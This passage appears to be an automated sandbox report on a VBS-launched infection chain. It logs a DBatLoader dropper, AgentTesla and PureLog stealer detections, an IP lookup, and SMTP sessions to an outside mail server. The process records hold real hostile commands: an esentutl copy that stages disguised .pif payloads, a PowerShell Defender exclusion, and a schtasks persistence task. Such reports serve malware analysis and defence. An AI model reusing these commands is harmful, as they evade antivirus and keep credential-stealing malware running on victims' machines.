                                                                                                                                                                                                                                                                                                                                CF-RAY: 8e576439ddd042cf-EWR
                                                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1694718&cwnd=252&unsent_bytes=0&cid=b841ff30dacbe731&ts=902&x=0"
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:25:13 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                3192.168.2.549900172.67.74.1524432676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:25:26 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:25:26 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 8e57648709bf43dd-EWR
                                                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2317&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1231547&cwnd=205&unsent_bytes=0&cid=999db7e7f2a730ec&ts=169&x=0"
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:25:26 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                                                                                                                                                                                                                                SMTP Packets

                                                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:01.032280922 CET5874977151.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 20 Nov 2024 09:25:00 +0000
                                                                                                                                                                                                                                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:01.032490015 CET49771587192.168.2.551.195.88.199EHLO 585948
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:01.212986946 CET5874977151.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 585948 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                250-8BITMIME
                                                                                                                                                                                                                                                                                                                                250-PIPELINING
                                                                                                                                                                                                                                                                                                                                250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                250-STARTTLS
                                                                                                                                                                                                                                                                                                                                250 HELP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:01.217319012 CET49771587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:01.407747030 CET5874977151.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.494328022 CET5874992651.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 20 Nov 2024 09:25:30 +0000
                                                                                                                                                                                                                                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.494544029 CET49926587192.168.2.551.195.88.199EHLO 585948
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.681730032 CET5874992651.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 585948 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                250-8BITMIME
                                                                                                                                                                                                                                                                                                                                250-PIPELINING
                                                                                                                                                                                                                                                                                                                                250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                250-STARTTLS
                                                                                                                                                                                                                                                                                                                                250 HELP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.681977987 CET49926587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.870675087 CET5874992651.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.829225063 CET5874995351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 20 Nov 2024 09:25:33 +0000
                                                                                                                                                                                                                                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.843178034 CET49953587192.168.2.551.195.88.199EHLO 585948
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.026179075 CET5874995351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 585948 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                250-8BITMIME
                                                                                                                                                                                                                                                                                                                                250-PIPELINING
                                                                                                                                                                                                                                                                                                                                250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                250-STARTTLS
                                                                                                                                                                                                                                                                                                                                250 HELP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.030335903 CET49953587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.211302042 CET5874995351.195.88.199192.168.2.5220 TLS go ahead

                                                                                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                                                Start time:04:24:30
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7ea370000
                                                                                                                                                                                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                                                Start time:04:24:31
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                                                                Start time:04:24:38
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                                                                                                                                                                                                                                                                                                                                Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                                                                Start time:04:24:38
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                                                                Start time:04:24:38
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                                                                                                                                Imagebase:0x8e0000
                                                                                                                                                                                                                                                                                                                                File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                                                                Start time:04:24:39
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                                                                                                                                                                                                                                                                                                                                Imagebase:0x8e0000
                                                                                                                                                                                                                                                                                                                                File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                                                Start time:04:24:40
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                                                                                Start time:04:24:40
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                                                Start time:04:24:41
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2413558815.0000000005850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.000000000301A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                                                Start time:04:24:41
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x680000
                                                                                                                                                                                                                                                                                                                                File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                                                                                                Start time:04:24:43
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                                                                                Imagebase:0xdf0000
                                                                                                                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                                                Start time:04:24:43
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                                                                                Start time:04:24:44
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                Imagebase:0x760000
                                                                                                                                                                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                                                                                Start time:04:24:44
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                                                                                Start time:04:24:55
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                                                                                                Start time:04:24:57
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                                                                                                Start time:04:24:57
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                                                                                                                File size:496'640 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                                                                                                Start time:04:24:58
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2549393142.0000000002A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2572030022.0000000004255000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2555146769.0000000003140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000003.2364237623.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
